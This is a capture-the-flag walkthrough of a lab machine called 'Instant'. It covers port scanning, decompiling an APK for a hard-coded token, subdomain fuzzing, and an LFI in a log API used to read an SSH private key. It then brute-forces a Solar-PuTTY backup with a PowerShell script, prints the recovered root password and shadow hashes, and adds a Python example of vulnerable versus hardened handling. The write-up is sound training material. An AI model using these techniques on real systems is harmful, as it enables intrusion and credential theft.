Basic information

Port scan

22 and 80:

$ nmap -sC -sV -Pn 10.10.11.37
Starting Nmap 7.95 ( https://nmap.org ) at 2024-10-14 14:38 CST
Nmap scan report for 10.10.11.37
Host is up (0.080s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 31:83:eb:9f:15:f8:40:a5:04:9c:cb:3f:f6:ec:49:76 (ECDSA)
|_ 256 6f:66:03:47:0e:8a:e0:03:97:67:5b:41:cf:e2:c7:c7 (ED25519)
80/tcp open http Apache httpd 2.4.58
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Did not follow redirect to http://instant.htb/
Service Info: Host: instant.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.69 seconds

80

Add the hosts entry:

10.10.11.37 instant.htb

A cryptocurrency-related site:

instant.apk

The page offers an APK. Download and decompile it, and you find a hard-coded API subdomain and a token:

Subdomain scan

A suitable wordlist is needed; the common ones contain nothing related to the swagger API:

(It can also be found by decompiling the APK, in res/xml/network_security_config.xml)

ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/n0kovo_subdomains.txt -u "http://instant.htb/" -H 'Host: FUZZ.instant.htb'  -fc 301

swagger-ui [Status: 302, Size: 203, Words: 18, Lines: 6, Duration: 357ms]

swagger-ui

Visiting swagger-ui gives API information that is not in the APK:

mywalletv1

After adding the hosts entry, test access to the API using the information from the APK:

After that, access the other APIs according to the API documentation:

read log

Judging by its request format, the read log API is an obvious LFI:

The usual guess that a private key file exists; read the private key:
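As an added example (not from the writeup or the box's own code), the read-log LFI pattern above rendered in Python: a naive handler that joins the requested name onto a log directory, beside a hardened one, plus a log-monitoring check for traversal sequences. The parameter name log_file_name, the directory layout and the sandbox files are assumptions.

```python
import tempfile
from pathlib import Path
from urllib.parse import unquote

# Constructed sandbox standing in for the server's filesystem: a log directory
# plus a "private key" outside it that a traversal payload would reach.
ROOT = Path(tempfile.mkdtemp(prefix="mywallet_demo_"))
LOG_DIR = ROOT / "logs"
LOG_DIR.mkdir()
(LOG_DIR / "app.log").write_text("INFO login ok\n")
(ROOT / "id_rsa").write_text("-----BEGIN OPENSSH PRIVATE KEY----- (constructed)\n")

def read_log_vulnerable(log_file_name: str) -> str:
    """Naive handler: joins user input onto the log directory, so a name
    such as '../id_rsa' escapes LOG_DIR. This is the LFI pattern."""
    with open(LOG_DIR / log_file_name) as fh:
        return fh.read()

class InvalidLogName(ValueError):
    """Raised by the hardened handler for any name that is not a plain log file."""

def read_log_hardened(log_file_name: str) -> str:
    """Allow-list the name (plain '*.log', no path separators), then resolve
    the final path (following symlinks) and require it to stay inside LOG_DIR."""
    if not log_file_name.endswith(".log") or "/" in log_file_name or "\\" in log_file_name:
        raise InvalidLogName(log_file_name)
    candidate = (LOG_DIR / log_file_name).resolve()
    if candidate.parent != LOG_DIR.resolve() or not candidate.is_file():
        raise InvalidLogName(log_file_name)
    with open(candidate) as fh:
        return fh.read()

def hardened_rejects(log_file_name: str) -> bool:
    """True if the hardened handler refuses the name (used for the checks)."""
    try:
        read_log_hardened(log_file_name)
    except InvalidLogName:
        return True
    return False

def is_traversal_attempt(raw_param: str) -> bool:
    """Detection helper for web-server logs: flags a '..' path component after
    URL-decoding twice, so single- and double-encoded payloads are caught too."""
    decoded = unquote(unquote(raw_param))
    return ".." in decoded.replace("\\", "/").split("/")
```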

user flag

Fix up the format of the retrieved private key and log in:

Solar-PuTTY

The usual rummaging through files turns up a backed-up Solar-PuTTY file:

scp -i shirohige_id_rsa shirohige@10.10.11.37:/opt/backups/Solar-PuTTY/sessions-backup.dat .

A search also turns up a decryption tool for it:

Decryption needs a password, so the usual brute force. The script does not stop on its own after a success; just check whether SolarPutty_sessions_decrypted.txt has appeared on the Desktop:

(A step is presumably skipped here: the decryption password can be obtained by cracking a hash from the web application's database, /home/shirohige/projects/mywallet/Instant-Api/mywallet/instance/instant.db)

"Username": "root",
"Password": "12**24nzC!r0c%q12",

SolarPuttyBruteforce.ps1

# Define the path to rockyou.txt and the executable
$rockyouPath = "C:\Users\miao\Desktop\SolarPuttyDecrypt_v1\rockyou.txt"
$decryptExePath = "C:\Users\miao\Desktop\SolarPuttyDecrypt_v1\SolarPuttyDecrypt.exe"
$sessionsFilePath = "C:\Users\miao\Desktop\SolarPuttyDecrypt_v1\sessions-backup.dat"

# Define the wrapper function
function Invoke-SolarPuttyBruteforce {
    Get-Content -Path $rockyouPath | ForEach-Object {
        $password = $_.Trim()
        try {
            # Run the decryption executable with the current password
            & $decryptExePath $sessionsFilePath $password
        }
        catch {
            Write-Output "Error: $_"
        }
    }
}

# Run the function
Invoke-SolarPuttyBruteforce

root flag

What we get is the root password; switch to root:

shadow

root:$y$j9T$kbk3gZheVl2NWS6Kg2bYA.$LxNokXrLQvRyfmzXJHiZgzH73o2.Dk6UMGHsyj/Er./:19945:0:99999:7:::
shirohige:$y$j9T$EIEFkB5maGHp2kSFVdu6Q/$7uwKO1Xx2qzjNyqWuNBADn6sCgguYDUX4wfsql9Geq4:19945:0:99999:7:::

References